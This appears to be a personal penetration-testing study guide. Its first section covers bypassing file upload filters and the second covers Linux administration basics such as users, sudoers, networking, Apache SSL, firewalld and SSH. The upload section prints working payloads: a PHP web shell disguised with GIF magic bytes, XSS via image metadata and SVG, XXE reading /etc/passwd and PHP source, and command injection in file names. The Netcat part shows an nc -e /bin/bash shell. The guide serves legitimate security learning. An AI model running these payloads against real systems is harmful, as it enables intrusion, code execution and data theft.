It may be possible to gain control over the back-end server even with image extensions. Furthermore, an attacker may use some allowed extensions to perform other attacks. It is not enough to only test the file extensions. This is why many modern web servers and web apps also test the content of the uploaded file to ensure it matches the specified type. While extension filters may accept several extensions, content filters usually specify a single category (i.e., images, videos, documents), which is why they do not typically use blacklists or whitelists. THis is because web servers provide functions to check for the file content type, and it usually falls under a specific category.

There are two common methods for validating the file content: **Content-Type Header** or **File Content**

**<u>Content-Type</u>**

If a file fails to upload even after using the aforementioned bypass techniques, that indicates that the file extension does not affect the error message and the web app must be testing the file content for type validation. 

Browsers automatically set the Content-Type header when selecting a file through the file selector dialog, usually derived from the file extension. However, since the browser sets this, this operation is a client-side operation, and can be manipulated to change the perceived file type and potentially bypass the type filter. 

Once this is determined, start **fuzzing the Content-Type Header** with seclists' **`Content-Type`** wordlist through **`Burp Intruder`** to see which types are allowed. If the error message specifies that only the images are allowed, limit the scan to image types:
```bash
cat SecLists/Discovery/Web-Content/web-all-content-types.txt | grep 'image/' > image-content-types.txt

```

Once this is done, intercept the upload request and fuzz the Content-Type header. If an image is successfully uploaded, modify the file content as well and resend the request. Now, visit the file and execute commands via the web shell or reverse shell. 

It is important to note that a file upload HTTP request has two Content-Type headers, one for the attached file (at the bottom), and one for the full request (at the top). 
* It is usually only necessary to modify the file's Content-Type header. 
   
   * In some cases, the request will only contain the main Content-Type (if the uploaded content was sent as POST data). If happenes, the main Content-Type will need to be modified. 

<br>

**<u>MIME-Type</u>**

A more common type of file content validation is testing the uploaded file's MIME-Type. MIME is an internet standard that determines the type of a file through its general format and bytes structure. 

This is usually done by inspecting the first few bytes of the file's content, which contains the **File Signature** or **Magic Bytes.**
* If a file starts with `GIF87a` or `GIF89a`, this indicates that it is a GIF image, while a file starting with plaintext is usually considered a text file.
   * Many other image types have non-printable bytes for their file signatures, while a GIF image starts with ASCII printable bytes, so it is the easiest to imitate. Furthermore, as the string `GIF8` is common between both GIF signatures, it is usually enough to imitate a GIF image.

* If the first bytes of any file is changed to the GIF magic bytes, its MIME type would be changed to a GIF image, regardless of its remaining content or extension. 

If `GIF8` is written to the beginning of the file, it will be considered a GIF image, even if it has a different extension. Web servers can slo use this standard to determine file types, which is usually more accurate than testing the file extension. 
* MIME types are similar to the ones found in the Content-Type headers, but their source is different, as PHP uses the `mime_content_type()` function to get a file's MIME type. 

Once a requested is forwarded, notice whether there is an error message for uploading only images. If this is the case, add `GIF8` before the malicious script to try to imitate a GIF image while keeping the file extension as .ext, so it would execute the malicious code regardless. The following is an example of how this can be done with PHP:
```html
------WebKitFormBoundaryxxxxxxxxxxx
Content-Disposition: form-data; name="uploadFile"; filename="shell.php"
Content-Type: image/jpg

GIF8
<?php system($_REQUEST['cmd']); ?>

------WebKitFormBoundaryxxxxxxxxxxx--

```

If the file gets uploaded successfully, then visit the uploaded file and execute system commands. Note that the command output will start with GIF8, as it was the first line in the malicious script to imitate the GIF magic bytes. This will be outputted as plaintext before the malicious code is executed. 

A combination of the aforementioend methods can be combined to bypass more robust content filters:
* An **Allowed MIME type** with a **disallowed Content-Type**

* An **Allowed MIME and Content-Type** with a **disallowed extension**

<a id="fileuploadlimited"></a>

#### **`Limited File Uploads`**

While file upload forms with weak filters can be exploited to upload arbitrary files, some upload forms have secure filters that may not be exploitable with the aforementioend techniques. However, even when dealing with a limited file upload form, which allows only specific types of files to be uploaded, an attacker may still be able to perform some attacks on the web app. 
* Certain file types (`SVG`, `HTML`, `XML`, and some image and document files) may allow an attacker to introduce new vulnerabilities to the web app by uploading malicious versions of these files. 
   * This is why fuzzing allowed file extensions is crucial, as it enables attackers to explore what attacks are possible on the web server. 

**<u>XSS</u>**

Many file types may allow the introduction of a **Stored XSS** vulnerability to the web app by uploading maliciously crafted versions of them. The most basic example is when a web app allows users to upload HTML files. Although HTML files won't allow the execution of code, it would still be possible to implement JS code within them to carry an **XSS** or **CSRF** attack on whoever visits the uploaded HTML page. If the target sees a link from a website they trust, and the website is vulnerable to uploading HTML documents, it may be possible to trick them into visiting the link and carry the attack on their machines.

Another example of XSS attacks is web apps that display an image's metadata after its upload. For such web apps, an XSS payload can be included in one of the metadata parameters that accept raw text, like the Comment parameter:
```bash
exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' xss.jpg

```
If this command is done, the Comment parameter will be updated to the XSS payload. When the image's metadata is displayed, the XSS payload should be triggered, and the JS code will be executed to carry the XSS attack. Furthermore, if the image's MIME-Type is change to **`text/html`,** some web apps may show it as an HTML document instead of an image, in which case the XSS payload would be triggered even if the metadata wasn't directly displayed. 

XSS attacks can also be carried with SVG images, along with several other attacks. SVG images are XML-based, and they describe 2D vector graphics, which the browser renders into an image. For this reason, their XML data can be modified to include an XSS payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
    <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
    <script type="text/javascript">alert(window.origin);</script>
</svg>

```
Once the image is uploaded to the web app, the XSS payload will be triggered whenever the image is displayed. 

For any of these attacks, try any XSS payload that can lead to RCE. 

<br>

**<u>XXE</u>**

With SVG images, malicious XML data can be included to leak the source code of the web app, and other internal documents within the server. The following shows how XXE can be used with an SVG image to leak the content of `/etc/passwd`:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

```
Once the above SVG image is uploaded and viewed, the XML document would get processed, and the attacker should get the info of `/etc/passwd` printed on the page or shown in the page source. Similarly, if the web app allows the upload of XML documents, then the same payload can carry the same attack when the XML data is displayed on the web app. 

While reading system files like `/etc/passwd` can be useful for server enumeration, it can have an even more significant benefit for web pentesting, as it allows the attacker to read the web app's source files. Access to the source code will enable attackers to find more vulnerabilities to exploit within the web app through **Whitebox Pentesting.** For file upload exploitation, it may allow an attacker to locate the upload directory, identify allowed extensions, or find the file naming scheme. 

To use XXE to read source code in PHP web apps, the following payload can be used within a malicious SVG image:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

```

Once the SVG image is displayed, a base64 encoded version of index.php will be output, which can be decoded to read the source code. 

Using XML data is not unique to SVG images, as it is also used by many types of documents, like **PDF, Word, Powerpoint, etc;** all of these documents include XML data within them to specify their format and structure. An SSRF attack can also be conducted: an XXE vulnerability can be used to enumerate the internally available services or call private APIs to perform private actions. 

<br>

**<u>DoS</u>**

An XXE payload, in tandem with a file upload vulnerability, may be used to achieve DoS. Also, Decompression bombs with file types that use data compression, like ZIP archives can cause a DoS if the web app automatically unzips a ZIP archive. 

A **Pixel Flood** attack can be used with some image files that use image compression, like JPG or PNG. A JPG image file can be created with any image size, and then have its compression data modified to have a size of (0xffff x 0xffff), which woud result in an image with a size of 4 Gigapixels. When the web app tries to display this image, it will attempt to allocate all of its memory to this image, resulting in a crash on the back-end server. 

<a id="fileuploadother"></a>

#### **`Other Upload Attacks`**

A common file upload attack uses a **malicious string for the uploaded file name,** which may get executed or processed if the uploaded file name is displayed (reflected) on the page. Try injecting a command in the file name, and if the web app uses the file name within an OS command, it may lead to a **command injection attack.**
* If a file is named **`file$(whoami).jpg`,** **file\`whoami\`** or **`file.jpg||whoami`,** and the web app attempts to move the uploaded file with an OS command, then the file name would inject the whoami command, which would get executed and lead to RCE. 

* Try injecting an XSS payload in the filename. This may get which executed on the target's machine if the file name is displayed to them

* Inject an SQL query in the filename **(`file';select+sleep(5);--.jpg`).** THis may lead to an SQLi if the file name is insecurely used in an SQL query

<br>

**<u>Upload Directory Disclosure</u>**

In some file upload forms, like a feedback form or a submission form, there may not be access to the link of the uploaded file, making the uploads directory unknown. In such cases, use **fuzzing to look for the uploads directory** or even use other vulnerabilities (LFI, XXE) to find where the uploaded files are by reading the web app source code. 

Another method that can be used to disclose the uploads directory is through forcing error messages, as they often reveal information for further exploitation. One attack that can be used to cause such errors is uploading a file with a name that already exists or sending two identical requests simultaneously, which may lead the web server to show an error that it could not write the file and disclose the uploads directory. Also, try uploading a file with an overly long name (i.e., 5,000 characters); if the web app doesn't handle this correctly, it may also error out and disclose the upload fdirectory. 

<br>

**<u>Windows-specific Attacks</u>**

Use Windows-specific techniques, like using reserved characters (`|`, `<`, `>`, `*`, or `?`), which are usually reserverd for special uses like wildcards. If the web app does not properly sanitize these names or wrap them within quotes, they may refer to another file (which may not exist) and cause an error that discloses the upload directory. 

Try using Windows reserved names for the uploaded file name, like `CON`, `COM1`, `LPT1`, or `NUL`, which may cause an error as the web app will not be allowed to write a file with this name. 

Use the Windows 8.3 Filename Convention to overwrite existing files or refer to files that do not exist. Older versions of Windows were limited to a short length for file names, so they used `~` to complete the file name. 
* To refer to a file called file.txt, use `FIL~1.TXT` or `FIL~2.TXT`, where the digit represents the order of the matching files that start with FIL. As Windows still supports this convention, an attacker can write a file called `WEB~.CONF` to overwrite the web.conf file. 

* Also try to write a file that replaces sensitive system files. This can lead to causing information disclosure through errors, a DoS on the back-end server, or accessing private files. 

***
<a id="linuxportion"></a>

## **Linux**

<a id="linuxintroos"></a>

### **`Introduction to Linux`**

<a id="editingwithvi"></a>

#### **`Editing with Vi and Vim`**

Vi and Vim are text editors that usually come preinstalled in the different Linux distributions. They are somewhat confusing to use at first, so the following briefly explains how to use them. It is important to remember that a relative or absolute path to the file works, but depending on the directory, sudo privileges may have to be enabled to write to a file. Also, if the file doesn't exist, Vi and Vim will create it with the specified name:
```bash
vi <File>

vim <File>
```

When starting Vi or Vim, the program is waiting for keyboard shortcuts to begin editing:
* **`i`:** Insert mode. This enables edits on the file. Once in insert mode, the file can be edited. To make more lines, go to the end of the last existing line and hit Enter. To leave insert mode, hit `Esc`. To **save** changes made in insert mode, hit Escape (leaving insert mode) and type **`:`**

* **`:`** Various colon commands
   * **`:wq`:** Write changes and quit

   * **`:q!`:** Force quit without saving any of the changes



<a id="crdeluseraccountslinux"></a>

#### **`Creating/Deleting User Accounts`**

The **`adduser`** command requires sudo privileges. This command adds the user to a group with their username and creates a home directory for that user. After creating the account, the root user will be prompted to create a password for the new user, enter a full name, room number, phone numbers, and other information.
```bash
sudo adduser <Username>
```

To switch users, use the **`su <Username>`** command.

<br>

The **`userdel`** command requires sudo privileges. If the `-r` flag is specified, this command will remove the user's home directory as well. If a user owns files outside of their home directory, the ownership and group permissions will default to an arbitrary number corresponding to the deleted user.
```bash
sudo userdel -r <Username>
```

<a id="managingpermissionsandsudousers"></a>

#### **`Managing Permissions and Sudo Users`**

The following command lists file permissions in the current directory:
```bash
ls -l

-rwxr-xr-- <Owner> <Group> <Size> <Date> <Time> <File>
```
* If another directory is in the current directory, the first `-` will be replaced by a `d` and the `<file>` will be blue to represent the directory name

* If a user can read the file but cannot write to it or execute it, they are considered **other** as they are neither in owner nor in the group. 

To change permissions on a file or a directory, the `chmod` command can be used:
```bash
chmod --- <File/Dir>
```
* In this case, each **-** in `---` is replaced by a numeric value for owner, group, and other permissions
   * **7: rwx**
   * **6: rw-**
   * **5: r-x**
   * **4: r--**
   * **3: -wx**
   * **2: -w-**
   * **1: --x**
   * **0: No permissions**

Besides adding permissions, permissions can be revoked with the same method. Even if a file or directory is in a particular user's home directory, they can still have their access revoked

When creating a new user, they will not be included in the **sudoers** file. This can be changed in the `/etc/sudoers` file. The `/etc` directory stores many configuration and administrative files. 
* By default, only the root user and users in the root group can access this file. However, a user with sudo privileges can also access this file 

Within the `/etc/sudoers` file, there are three sections of primary importance. 
1. **User privileges specification**
2. **Members of the admin group may gain root privileges**
3. **Allow members of the group sudo to execute any command**
   * Groups are denoted by the `%`. By default, the groups with sudo privileges include **%admin** and **%sudo.** 

While `/etc/sudoers` can be edited, and at some point may require modification, it is NOT recommended to use sudo to edit this file directly because it allows the user to make invalid changes. Linux relies on this file to be functional for the OS to work properly, so if the root user was removed from this file, the computer would break because the root user would be unable to run things with the appropriate permissions. Instead, the `visudo` command can be used as root.
* `visudo` is specifically designed to edit the /etc/sudoers file, so no path is needed. Just type `sudo visudo`


Once using `visudo`, there are different ways to edit the sudoers file:
```bash
root  ALL=(ALL:ALL) ALL
user  ALL=(ALL:ALL) ALL
```

<a id="linuxgroups"></a>

#### **`Groups`**

For the first created user, the OS automatically adds that user to certain groups. When another user is created, they are placed into a group with their username. 
* To determine which groups a user belongs to, the `groups` command can be performed. 
   * To determine what groups another user belongs to, `groups <User>` can be specified.

* The `id` command will provide additional group details, including the number assigned to the group by the OS
   * The `uid` yields the user ID of the logged-in user
   * The `gid` yields the group ID of any associated groups

These commands can be used to determine which groups can be added to the `/etc/sudoers` file. Particularly the line that says **Allow members of group sudo to execute any command** should be noted, as individual users can be added to the `%sudo` group. In certain cases, groups can be added to this portion of the file to grant members of the specified group to execute any command; doing so requires the group name to be prepended by a `%`.

To modify an individual users group account, the following can be done from user account with sudo privileges:
```bash
sudo usermod [-a] -G sudo <User>
```
* The `usermod` command allows sudo users to modify different attributes that are associated with an account, including groups. This command append to the existing groups that a user is associated with or overwrite the associated user groups
   * The `-a` flag is used to append
   * The `-G` flag is used to specify an existing group that the user is to be added to
* If the user has an active session while group changes were made, *they may have to exit and start a new session for the group permissions to take effect*

The group configuration file is located in `/etc/group`. Like the sudoers file, this should not be directly edited; the `usermod` command should be used in lieu. In this file, the `gid` and users associated with the group will be present, separated by commas.  

<a id="pwandshdwhashes"></a>

#### **`Passwords and Shadow Hashes`**

Any user can change their own password through the `passwd` command. If a user has sudo permissions, they can change the password of other users without knowing the current password:
```bash
sudo passwd <User>
```

Although the `/etc/passwd` file exists, it does not store password information. This file lists service and user accounts, with the user-created accounts towards the bottom. 
* For accounts that can be logged in to, the final portion often specifies `/bin/bash`. This means that the account uses a bash shell to interact with the terminal. 
   * The accounts that end with `/nologin` are not accessible. This can be used to disable an account, changing `/bin/bash` to `/usr/sbin/nologin`


**Password information is stored in the `/etc/shadow` file.** This file should require sudo privileges to access. Accessible accounts will have a hash to represent the password, from the first colon to the proceeding colon (including the `/`). The computer will save the hash of the user's password; everytime the password is input, the computer will hash it and compare it to the stored hash for authentication. 
* The `$6$` represents a salt added to the hash. 

Besides brute forcing the hash through john, the hash can be calculated via Python
```py
import crypt

crypt.crypt("password", "$6$.......$")
```

<a id="explntwkconf"></a>

#### **`Networking Configuration`**

**<u>Ubuntu</u>**

The `ifconfig` command on Ubuntu is oftentimes not installed. In this case, the `ip a` command can be used in lieu. The `a` flag outputs all of the available network interfaces:
* **`lo`:** Represents the loopback interface. This is used for internal testing, using the default localhost (127.0.0.1) IP address

* **`ens18`:** On Ubuntu systems, this is the name of the first interface. By default, Ubuntu systems have a `/etc/netplan/01-network-manager-all.yaml` file that contains networking configuration for the device. On computers with a more advanced networking configuration, however, there may be more than one file in this netplan directory. This file can be modified to statically configure an IP address or DHCP:
```bash
sudo nano /etc/netplan/01-network-manager-all.yaml

network:
  version: 2
  renderer: NetworkManager
  ethernets: 
    ens18: 
      addresses:
        - x.x.x.x/CIDR
```
* By default, this file will contain the `version` and `renderer` only. Also, there will be two spaces behind them, which needs to remain consistent for the added `ethernets` value.
   * The `ens18` value will have a total of four spaces before it, as it must follow the initial spacing rules. `addresses` must have a total of six spaces before it. Remember to include the `-` before the IP address
   * Also, use CIDR notation for the subnet mask; do not include spaces

After the IP address is manually changed, the service needs to be restarted. This can be done via **`sudo netplan apply`**


**<u>The following two commands can be done on both Ubuntu and Kali:</u>**

It is also possible to create a **temporary IP address** through the `ip` command:
```bash
sudo ip addr add x.x.x.x/CIDR dev <ens18 or ethX>
```

> Temporary IP addresses are not saved with a system restart. In this case, the input IP address through the ip command will not be saved to the /etc/netplan/01-network-manager-all.yaml file

Again, the `ip` command can be used to flush IP addresses on an interface:
```bash
sudo ip addr flush dev <ens18 or ethX>
```


<br>

**<u>Kali</u>**

The `ifconfig` command is often installed via the `net-tools` package on the Kali distribution. However, the `ip a` command should still be used to show the available interfaces:
* **`lo`:** Represents the loopback interace. This is the same as the Ubuntu distribution. This should not be modified, as by default it should be the localhost address, but if for any reason needs to be changed, it can be found within the `/etc/network/interfaces` file

* **`eth0`:** This interface is often included in Kali systems. The `/etc/network/interfaces` file is used to statically configure an IP address or use DHCP to have an IP address assigned to this interface:
```bash
sudo nano /etc/network/interfaces

# The loopback network interface
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet <dhcp> <static> # if dhcp, just write dhcp. if static, continue but write static
    address x.x.x.x
    netmask x.x.x.x
```

After the IP address is manually changed, the service needs to be restarted. This can be done via `sudo systemctl restart networking`. For an external facing machine, the address and netmask do not need to be specified.

<br>

**<u>CentOS</u>**

The `ip a` command should be used in this distribution to list available interfaces:
* **`lo`:** Represents the loopback interface. This interface can be viewed and edited through the `/etc/sysconfig/network-scripts/ifcg-lo` file.

* **`eth0`:** Because CentOS is typically installed on routers, it will often have multiple interfaces. This is not to say that Kali or Ubuntu cannot have multiple interfaces, as they can have WLAN adapters and an Ethernet adapter to have more interfaces. However, with CentOS, the different interfaces must be configured to have connections to the different networks. The `/etc/sysconfig/network-scripts/` directory contains `ifcfg-ethX` files, where where X represents the specific interface to be configured. Depending on how many interfaces are, there may be several files. The following command can be done to assign a static IP address to the eth0 interface:
```bash
sudo vi /etc/sysconfig/network-scripts/ifcfg-eth0

...
BOOTPROTO=<dhcp or static>    #keep as dhcp if it is to be used; do not change the other options
...
ONBOOT=yes
IPADDR=x.x.x.x
NETMASK=x.x.x.x
```

After the IP address is manually changed, the service needs to be restarted. This can be done via `sudo systemctl restart network`. 

<a id="usingntwksrvwnc"></a>

#### **`Using Networking Service with Netcat`**

Netcat gathers network data for trying to establish connections for trying to read data that some server is giving off. Besides being used for shells, it allows users to see raw data from a server. The following shows how it can be used to represent a single client-server relationship
```bash
nc -lp 54321   # server

nc x.x.x.x 54321    #client
```
* In this case, the client and server can send text to each other simultaneously

As mentioned, nc can be abused. Instead of using the service like in the previous example, all of the received data can be redirected to another application that exists on the server, like `/bin/bash` to control the entire system. The following shows how this can be done:
```bash
nc -lp 54321 -e /bin/bash  #server

nc x.x.x.x 54321     #client
```
* This effectively opens a reverse shell, allowing the client command access to the server

<a id="websrvwapche"></a>

#### **`Web Services with Apache`**

Before configuring a web service, it is important to determine what service is running on the computer. There are multiple potential services that could be running the website, and depending on which one is installed, the necessary commands and files will vary. First, check all the available services on the machine by using the `systemctl` command.
```bash
systemctl status [apache2, nginx, httpd]
```
* This can also be done by looking for web service configuration files in the `/etc` directory, but may take much longer. 

The following section focuses on apache2. If on a machine, it may be inactive initially. 

**1. Go to the `/etc/apache2` directory**

**2. Look at the default, base configuration file:**
```bash
nano /etc/apache2/apache2.conf
```
   * There are more configuration files in the **`/etc/apache2/sites-available`** and **`/etc/apache2/sites-enabled`** directories
      * In the **`sites-available/000-default.conf**`** file, the IP address and port that the Apache web service will listen on will be explicitly mentioned on the first line, next to **VirtualHost**. By default, it will listen on any IP address on the device (*) on port 80. 
   * The **DocumentRoot** variable is the location in the file system where the website exists. By default, this is on `/var/www/html`. This essentially means that the files that run the website are located in the listed directory. 

**3. Go to the `/var/www/html` directory**
   * By default, only the **index.html** file will be listed. Most websites are programmed to try to load up an index.html or index.php when a user tries to access the web service. Of course, this file can be edited

**4. Start Apache2**
```bash
sudo systemctl start apache2
```
   * To confirm that the service is now running, either visit localhost on a web browser or input `systemctl status apache2`
   * Once the service is started, the data from the `/var/www/html/index.html` file will be presented to anyone that accesses the website.

**5. Add directories or files to the `/var/www/html` directory**

**6. Modify permissions to the directories and files in the web service**
   * There can be files and directories in the **`/var/www/html`** directory that are restricted to certain users. To allow the web service to read these files, the `chmod` command can be used as it is for regular files on the system. 
```bash
sudo chmod xx2 /var/www/html/<File>
```
   * If files are copied or moved from other locations, they will retain the same permissions. 

**7. Stop web service**
```bash
sudo systemctl stop apache2
```
* Running/stopped refers to the current status of the service

* **Disabled** means that the service will not start when the computer is restarted; **Enabled** means that the service will start when the computer is restarted. This can be done with the following command:
```bash
sudo systemctl disable apache2

sudo systemctl enable apache2
```

<br>

**<u>Configuring SSL on Apache2 (CSR)</u>**

**1. Confirm that port 80 (apache) is actively listening**
```bash
sudo netstat -tupln | grep apache

```

**2. Generate a private key**
```bash
sudo openssl genpkey -algorithm rsa -out /etc/ssl/private/private.key -aes256

```

**2. Generate CSR (Certificate Signing Request)**
```bash
sudo openssl req -new -key /etc/ssl/private/private.key -out /etc/ssl/certs/request.csr

```

> Determine how to send the CSR to the CA first. If the CA has a web form, send the CSR there. Step #4 & #5 will be the same regardless.


Once the signed certificate is received from the CA, put it in `/etc/ssl/certs` with a descriptive name. 


**3. Put certificate into sites-available configuration:** Modify the `sites-available/default-ssl.conf` file once the signed certificate is received from the CA. 
```bash
<VirtualHost *:443>
        ServerName [hostname]
        ServerAdmin webmaster@localhost
[...]

        #   A self-signed (snakeoil) certificate can be created by installing
        #   the ssl-cert package. See
        #   /usr/share/doc/apache2/README.Debian.gz for more info.
        #   If both key and certificate are stored in the same file, only the
        #   SSLCertificateFile directive is needed.
        #   SSLCertificateFile      /etc/ssl/certs/ssl-cert-snakeoil.pem   --commented out
        #   SSLCertificateKeyFile   /etc/ssl/private/ssl-cert-snakeoil.key    --commented out
        SSLCertificateFile          /etc/ssl/certs/signed_cert.crt
        SSLCertificateKeyFile       /etc/ssl/private/private.key 

```

**4. Enable SSL Changes**
```bash
sudo a2ensite default-ssl.conf

sudo systemctl reload apache2
```

<br>

**<u>Configuring SSL on Apache2 (Self-Signed)</u>**

**1. Confirm that port 80 (apache) is actively listening**
```bash
sudo netstat -tupln | grep apache

```

**2. Look through available modules:** By default, there should be two ssl files (ssl.conf and ssl.load)
```bash
ls /etc/apache2/mods-available | grep ssl

```

**3. Determine whether SSl is an enabled module:** The previously mentioned files should not be enabled by default, but it is worth checking this directory for PoC. 
```bash
ls /etc/apache2/mods-enabled | grep ssl

```

**4. Enable Apache2 SSL module:** After this step is complete, **repeat step #1 to ensure that port 443 is listening.** After the first command is executed, specific instructions will be created in `/usr/share/doc/apache2/README.Debian`. This needs to be gunzipped; the following steps essentially go over the same.
```bash
sudo a2enmod ssl

sudo systemctl restart apache2

```

**5. Generate certificate:** This creates a self-signed certificate (x.509) instead of requesting a certificate signing.
```bash
sudo mkdir /etc/apache2/certs

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/certs/mysite.key -out /etc/apache2/certs/mysite.cert

```

**6. Put certificate into sites-available configuration:** Modify the `sites-available/default-ssl.conf` file. In this file, create a new line, indented the same as ServerAdmin, with the ServerName and the hostname. The hostname needs to match the domain name that was entered on the certificate. Then, scroll down to the certificate portion, comment out the demonstrated portions, and point the certificate file to the previously generated certificate
```bash
<VirtualHost *:443>
        ServerName [hostname]
        ServerAdmin webmaster@localhost
[...]

        #   A self-signed (snakeoil) certificate can be created by installing
        #   the ssl-cert package. See
        #   /usr/share/doc/apache2/README.Debian.gz for more info.
        #   If both key and certificate are stored in the same file, only the
        #   SSLCertificateFile directive is needed.
        #   SSLCertificateFile      /etc/ssl/certs/ssl-cert-snakeoil.pem   --commented out
        #   SSLCertificateKeyFile   /etc/ssl/private/ssl-cert-snakeoil.key    --commented out
        SSLCertificateFile          /etc/apache2/certs/mysite.cert
        SSLCertificateKeyFile       /etc/apache2/certs/mysite.key

```

**7. Enable SSL Changes**
```bash
sudo a2ensite default-ssl.conf

sudo systemctl reload apache2
```

<a id="routerconfig"></a>

#### **`Router and Gateway Configuration`**

While routing can be set up in many ways, the following is an initial way for routing to transpire from one network on one interface across an interface in another network. In CentOS, a lot of the routing occurs at the firewall, as it manages the rules of the connected network, specifically who's not allowed to send traffic across networks. Therefore, the firewall configuration should be checked first:

**1. Check Firewall Rules:** Most of the commands pertaining to the firewall require sudo privileges. The firewall takes the current configuration and breaks it up to several zones. The following command yields information about the zones that have already been set up.
```bash
sudo firewall-cmd --list-all-zones | less
```
* The firewall sets up one zone (public) as the default, denoted by **active.** Look at what has been applied to this zone, as it explains what types of rules and conditions are currently being applied to the various network connections. 
   * The previously set up interfaces are also in the active zone, denoted by **interfaces.**
   * The services that are allowed are listed next to the **services** row. By default, ssh and DHCP client are permitted. 
* Not every zone has the same defaults; zones are configured differently and not every zone is used simultaneously. Initially, the most important zone is the active one, as it contains the set up interfaces. Of course, the interface(s) can be changed to another zone to have a different set of rules applied to it. 

<br>

**2. View Specific Zones**
```bash
sudo firewall-cmd --list-all --zone=<Zone>
```

<br>

**3A. Assign Interfaces to the External and Internal Zones via ifcg:** The previously configured interfaces can both be assigned to the public zone and allow routing, however, it is not an ideal configuration. An interface can be assigned to a different zone that is designed to enable routing. The zones that are best equipped for this are the **External Zone** and the **Internal Zone.** There are two basic ways to do this
```bash
sudo vi /etc/sysconfig/network-scripts/ifcfg-eth0

...
BOOTPROTO=<dhcp or static>    #keep as dhcp if it is to be used; do not change the other options
...
ONBOOT=yes
IPADDR=x.x.x.x
NETMASK=x.x.x.x
ZONE=<external or internal>
```
* The first method of applying an interface to a specific zone includes **adding the zone variable to the ifcg file when configuring the interface in the first place.** This is the quickest way. After this is done, the interface must be restarted via the `sudo systemctl restart network` command.

**3B. Assign Interfaces to the External and Internal Zones via the CLI**
```bash
sudo firewall-cmd --change-interface=<ethX> --zone=<internal or external> --permanent

sudo firewall-cmd --reload    #apply the permanent flag; only use if the --permanent flag is applied
```
* If just testing a configuration change, the `--permanent` flag does not have to be included. However, if it is not included, the interface assignment is temporary and will not survive system or service restarts. 
* If the `--permanent` flag is used, it doesn't get applied until the service is restarted. To establish the changes, the second command should be used. 

<br>

After either of these methods are done, the rules that are associated with the internal or external interface are going to be used with the IP addresses assigned to that interface. Of course, the internal IP address should be assigned to the internal zone and the external IP address should be assigned to the external zone. At this point, run the `sudo firewall-cmd --list-all --zone=<external or internal>` to view the **services** associated with each zone. **The services allowed on each zone can be modified, allowing or restricting incoming connections to the computer on the service-ports. This is shown on *step #blank*** 
* For the **External Zone,** the **`ssh`** service is enabled by default.

* For the **Internal Zone,**  **`ssh`, `mdns` `sambda`, and `DHCP client`** are enabled by default. 

<br>

On the external zone, masquerading is enabled by default. **Masquerading** allows internal devices to use this as a router and go out to the external network. Internal devices should be able to use the router as their gateway to access external services. For this reason, **masquerading** should be enabled on the external zone. 

**4. Forward External Traffic to an Internal Service from the Router (Adding a Port Forward):** From a routing perspective, if there is a [desired] public service (i.e., web server) on an internal network, traffic from the outside should be able to access it. While the following command will be specific to a web server, it can be used for other services.
```bash
sudo firewall-cmd --zone=external --add-forward-port=port=80:proto=tcp:toport=80:toaddr=<Internal Service Address> --permanent

sudo firewall-cmd --reload    #apply the permanent flag; only use if the --permanent flag is applied
```
* This command essentially allows any foreign address to visit the internal [web] service via the external IP address of the router. Anytime a foreign address sends a request to the external IP address of the router, it will be forwarded to the internal web server in this case. 
   * The router firewall is acting as a layer of protection so that foreign users don't access the web server directly; the external users are being effectively filtered through the router. This is known as a **Forward,** as the router will take the request and pass it on to another device. 
   * **DO NOT ADD A SERVICE TO THE ROUTER** if the router itself is not running the web page. In most cases, it is not and adding a service to the router will broaden the attack surface. 

<br>

**5. Set up Gateway for Internal Machines:** The internal machines must have a gateway to access external networks. In order for the traffic on the internal machines to find their way back, gateways must be configured. **The gateway of these internal machines must be the internal IP address of the router,** so if a request comes in, it will get forwarded to the respective internal machine (due to the router's port forwarding), and when the internal machine responds, it will send the traffic through its default gateway (router's internal IP address) which will send the traffic to the external side due to masquerading. **The following command is done on the internal machine, NOT ON THE ROUTER.**
```bash
# Ubuntu
sudo nano /etc/netplan/01-network-manager-all.yaml

network:
  version: 2
  renderer: NetworkManager
  ethernets: 
    ens18: 
      addresses:
        - x.x.x.x/CIDR
      gateway4: x.x.x.x
```
* After the gateway is added (the netmask does not need to be specified), save the changes via the **`sudo netplan apply`** command and restart the service running on the machine; in this case, the apache2 service: **`sudo systemctl restart apache2`**

The following command is for an internal Kali machine:
```bash
# Kali
sudo nano /etc/network/interfaces

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet <dhcp> <static>
      address x.x.x.x
      netmask x.x.x.x
      gateway x.x.x.x
```
* After the gateway is added, save the changes via the **`sudo systemctl restart networking`**

<a id="sshservbasics"></a>

#### **`SSH Service Basics`**

To determine whether an SSH service is already installed, the following command can be executed:
```bash
systemctl status [ssh, sshd]
```

After determining whether an ssh service is installed on the machine, view the configuration files in `/etc/ssh`. The files within this directory are crucial for setting up a secure ssh server. 
* **`ssh_config`**

* **`sshd_config`:** This file contains the default port (22) of ssh. To change this port, first make sure that it does not conflict with other services. Once it is determined that no other services will be affected, access this file with sudo privileges, uncomment the port line, and then change the port. Also, specific listening addresses can be specified; if at the default **0.0.0.0** address, any IP address assigned to the device can be the specific listening address. If this is changed to a specific address, only that address will listen for incoming ssh connections. The **`PermitRootLogin`** setting allows the root user to be logged in to from an incoming connection. To enforce strict security, this can be uncommented and no can be specified

As more ssh connections are established, folders will be created on the client side. These can be seen by the `ls -a` command in the `~/.ssh` folder; the `known_hosts` file is located within this directory, which contains the public keys of the connected ssh servers. To generate new keys, the following command can be performed:
```bash
sudo ssh-keygen -t ecdsa -f /etc/ssh/ssh_host_ecdsa_key  #overwrite the existing key pair
```

At this point, computers that have previously connected to the ssh server will get an error stating that the remote host identification has failed. They will not receive the login prompt; to fix this, the known_hosts file must be deleted or the corresponding entry can be removed. 

<br>

